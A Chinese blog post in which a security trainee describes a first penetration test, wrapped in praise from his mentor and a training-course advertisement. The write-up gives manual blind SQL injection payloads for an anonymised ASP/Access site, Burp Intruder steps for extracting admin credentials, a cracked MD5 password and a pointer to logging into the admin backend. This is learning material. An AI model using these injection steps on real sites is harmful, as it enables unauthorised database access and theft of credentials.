开篇语:这是船山院士网络安全团队学员、团队主力成员QJJ的分享,能碰到一个好的徒弟也不容易,几个月前,他找到我,想学网络安全相关的课程,说在某培训机构交了好几千,连个CTF题目都没办法输出。和我聊了很久,QJJ是个非常实诚的孩子,农村长大,靠自己的努力考上了大学,家境属于靠自己的努力,才能有未来的那种,和很多咨询一下学费就闪的人强很多,一直以来有很多人咨询我,第一句就是:学费多少?我出于礼貌认真答复每一位咨询的人,详细课程的内容和将来的福利,然后,就然后,没有下文了。我常常说,人有三种境界:见识、态度、格局。很多人想学,想学以后就没有了,聪明的人很多,但是这个世界真正努力的人很少。QJJ属于努力的那种,我希望他在奇安信的实习中,能够收获更多的实战工作经验,为明年的高薪就业打下坚实的基础,预祝学有所成!一起努力,未来可期! ——师父:小浪
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
当场语塞,学习网安这么久,确实是一篇文章没有写过。属实是有点垃圾,写不出来什么比较好的文章,但是在师父的邀(yin)请(wei)下不得不输出一篇了。
在五分钟中前我准备写一篇关于信息收集的文章,但是网上一搜一大堆而且信息收集涉及的内容、工具、工具的使用等太多了,过于麻烦,所以我的第一篇文章我还是准备水一下。
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
在某搜索引擎和某歌上面搜了一天也没有找到一个我可以操作的站,最最主要的还是我的技术不到位。所以接下来就对文档中的网站进行操作。
http://xxx.com/about.asp?id=51and 1=1
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
http://xxx.com/about.asp?id=51 and 1=2
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
直接sqlmap一把梭了
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
幸亏跑了一下 access数据库,一开始以为是mysql数据库,但是后面才反应过来asp站一般都是access数据库
还是手注,不然没截图了,先试一下order by
http://xxx.com/about.asp?id=51 order by 3
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
发现不管order by 什么都是一样果断放弃 order by,试试布尔盲注
测表名
尝试有没有admin表(一般情况都有)
http://xxx.com/about.asp?id=51and exists (select * from admin)
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
测字段名
http://xxx.com/about.asp?id=51 and exists (select username from admin)
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
显然没有username,换name试一下
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
有name字段
这里测试到最后发现nama一文不值,后发现还有admin_name字段,那admin_pass字段也有了
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
测字段长度
http://xxx.com/about.asp?id=51 and (select top 1 len(name) from admin)=4
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
测数据
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
这里我们使用bp
• 抓到包后CTRL+I 发动到intruder模块
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
• 选择这个Cluster bomb
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
• 设置成图下(意思就是让选中的字段进行递归增加)
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
• 设置payloads
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
• 右上角 start attack,等待结果
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
因为他是ascii码要转成字符串
http://tools.bugscaner.com/ascii.html
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
同样的操作得到admin_pass
md5加密:a11e1027cf07d7a5398e3524744fd918解密:88619895
找后台,然后登录后台
写在后面
这篇文章是我的第一篇文章,在大佬们面前只是一篇很简单的文章。虽然操作上面是比较简单,简单到直接可以一把梭,我还是尝试手注。那我们有没有真正考虑到一个问题,如果我们连最基本的手注都不会,那我们的基础是可以有多差呢。一味的追求工具带来的快感是不好的,我们更应该去深入的了解sql注入的原理,而不是根据某搜索引擎,某歌的搜索方法去找到一个网站后,直接就上工具。那个样子我们就会变得很迷茫,当你长时间这样的去挖洞。我们也会慢慢的麻木,虽然获得了短暂的快感,感觉自己可以了,久而久之你就会麻木。会感觉没意思,所以我觉得更应该追究其原理,而非那短暂的快感!师父常常给我们说,实践决定你是否入门?理论决定你走多远?掌握原理,才能事半功倍,谁不想成为技术大神呢!
我其实是计科专业,对于网络安全,我还是不够了解。网络安全涉及的学科太多,网络工程、编程语言、计算机原理、社工、操作系统、数据库、大数据、云计算、区块链、IOT、物联网、逆向等等。其实想想也已经过去二三年了,对于网络安全我是一直在学习努力中,不知道对于在读的你现在是否和我一样呢!我的安全之路开始于一部叫《whoami》的电影。这部电影让我知道了什么是网络安全?什么是黑客?那天是2019年3月17日。看完之后,我就和我的室友交流,直言:hacker很牛、很帅、很酷,室友看出我对这个方向的兴趣,随机淘宝下单hacker从入门到入yu。真的是八块钱起家。要说一把梭我2019年就会了。但是到现在2022年我还是感觉一事无成,啥也没有学会,纯纯小白。去年我决定报个培训机构的班,有老师带着也是学习的捷径之一嘛。但种种原因啊,反正学完之后,不能说毫无收获。准确的来说和我八块钱买的课程差不多。这波真的是血亏,所以奉劝大家要是真的想报班,就找一个靠谱一点的。
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
2021年12月的时候,认识了我现在的老师,也是大家深知的浪师父。大家应该很了解了吧,浪师父干了二十多年的开发。听到之后我人都傻了一半。可能有人要说开发dog了,我也想说,但这完完全全是嫉妒之后的不当言语。确实是非常的崇拜啊。我在浪师父这里学习的是网络安全,当然浪师父也教我们开发,也和我们分享他读过的书,做过的事,认识过的人,走过的弯路。在浪师父这里,他把我们当做一辈子的好兄弟。可惜啊,我太阿斗了,属实是扶不起来。但是认识浪师父是我这一生的转折吧!确实没有人会这么的关注我。就比如说这次的实习工作也是我们浪师父给安排的,当然也是不差的,确实也不方便透露,不然我肯定要“骄傲”一下。路需要我们踏踏实实的去走,戒骄戒躁。浪师父对团队里面所有人都很关注的,比如少客联盟CEO—xu哥,高冷帅气的kuan哥、未来的将军bo哥、大器晚成的fu哥等等,还有很多人。由于我实力还是偏弱,团队的事情一般都是浪师父去处理。也是默默的叹口气啊!所以大家还是要多加油啊,只有自己的实力足够强大的时候,说话才够硬气!
最后感谢大家,看完了我第一篇的文章。要是有足够的能力我后面会有好的文章带给大家,谢谢!
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
船山院士网络安全团队长期招募学员,零基础上课,终生学习,知识更新,学习不停!包就业,护网,实习,加入团队,外包项目等机会,月薪10K起步,互相信任是前提,一起努力是必须,成就高薪是目标!相信我们的努力你可以看到!想学习的学员,加下面小浪队长的微信咨询!
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
欢迎大家加群一起讨论学习和交流
(此群已满200人,需要添加群主邀请)
![原创 | 我的第一篇渗透。。。。。]( "原创 | 我的第一篇渗透。。。。。")
人生道路很长,未来可期,
哪怕脚步慢一点也无妨!
原文始发于微信公众号(衡阳信安):原创 | 我的第一篇渗透。。。。。
评论